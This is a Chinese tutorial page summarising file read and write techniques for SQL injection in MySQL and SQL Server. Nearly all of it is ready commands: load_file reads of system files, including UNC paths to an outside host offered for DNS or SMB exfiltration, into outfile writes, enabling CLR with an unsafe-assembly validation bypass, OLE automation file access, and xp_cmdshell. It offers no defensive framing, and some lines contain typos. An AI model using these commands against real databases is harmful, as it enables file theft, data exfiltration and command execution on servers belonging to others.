萬盛學電腦網

 萬盛學電腦網 >> 數據庫 >> mysql教程 >> 分析SQL注入中的文件讀寫總結

分析SQL注入中的文件讀寫總結

SQL注入有直接sql注入也有文件讀寫時的注入了我們這篇文章介紹的是SQL注入中的文件讀寫這一塊的內容,具體的一起來看看。


一、MySQL

讀文件

常見的讀文件,可以用16進制代替字符串

select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt')       # smb協議
select load_file('\\\\ecma.io\\1.txt')    # 可用於DNS隧道

寫文件

我暫時已知l兩種寫文件的方式


select 0x313233 into outfile 'D:/1.txt'


select 0x313233 into dumpfile 'D:/1.txt'


二、 SQL Server

讀文件

1. BULK INSERT


create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';
 

2. CLR集成

 

// 開啟CLR集成
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'clr enabled',1
reconfigure


create assembly sqb from 'd:\1.exe' with permission_set=unsafe
 

上面一句可以利用create assembly函數從遠程服務器加載任何.NET二進制文件到數據庫中;但是他會驗證是否為合法.NET程序,導致失敗,下面是讀取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files
繞過,首先加載一個有效的.NET的二進制文件,然後追加文件即可,下面是繞過方法。

create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt'
alter assembly sqb add file from 'd:\notnet.exe'
 

3. Script.FileSystemObject

 

# 開啟Ole Automation Procedures
 
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_onmethod @f, 'readline', @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

寫文件

1. Script.FileSystemObject


declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'


2. BCP復制文件(測試失敗,無bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"


3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'


三、Oracle

pass,Oracle太坑了~~~幾乎都受到PL/SQL的限制,暫時不討論

copyright © 萬盛學電腦網 all rights reserved